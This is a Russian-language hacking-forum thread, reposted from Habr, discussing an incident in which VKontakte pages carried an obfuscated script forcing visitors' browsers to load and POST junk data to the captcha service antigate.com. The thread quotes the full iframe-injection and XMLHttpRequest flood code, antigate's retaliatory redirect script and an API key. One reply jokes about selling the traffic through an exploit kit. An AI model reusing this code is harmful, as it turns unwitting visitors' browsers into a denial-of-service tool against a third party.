• XSS.stack #1 – первый литературный журнал от юзеров форума

VK vs antigate

DASM32

(L2) cache
Пользователь
Регистрация
14.05.2008
Сообщения
451
Реакции
5
Драма, господа, чистой воды драма:

Сегодня у ВКонтакте на всех страницах появлися странный скрипт:

Код:
function _test() {
  var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>this.location="http://ant'+'iga'+'te.com/i'+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+'g=o'+'n";</sc'+'ript>');setTimeout(re.pbind(fr),1000);
}

А в <body>:
Код:
<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">

Подтверждаю, скрипт сам видел :)
Позже антигейт, говорят, стал отдавать
Код:
<script>parent.document.location.href = 'http://xvideos.com/'; parent.document.location = 'http://xvideos.com/';  top.document.location = 'http://xvideos.com/';</script>

Примерно в 11:27 лавочку кажись прикрыли.

© http://habrahabr.ru/post/142836/
 
не догадались antigate-цы поставить на связочку это дело , столько трафа халявного :)
 
Говорят, в 12:49 сменили на
Код:
function _test(){var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>var XHR=window.XDomainRequest||window.XMLHttpRequest,xhr=new XHR();xhr.open("POST","http://ant'+'iga'+'te.com/i'+'n.php",true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");var tmp2="e8532291e45ec27a85e87692e070da98";for(i=0;i<5;++i)tmp2+=tmp2;xhr.send("method=base64&key=fb856f0ab752e3894fbdb3c4613ca924&body="+tmp2+"&ext=jpg");</sc'+'ript>');d.close();setTimeout(re.pbind(fr),1000);}

На данный же момент там
Код:
<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">
function _test(){}
Как будто пистолет опустил, припрятал в карман, а дуло все еще выглядывает.
Всем офисом думают, чего бы еще понаписать :lol2:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх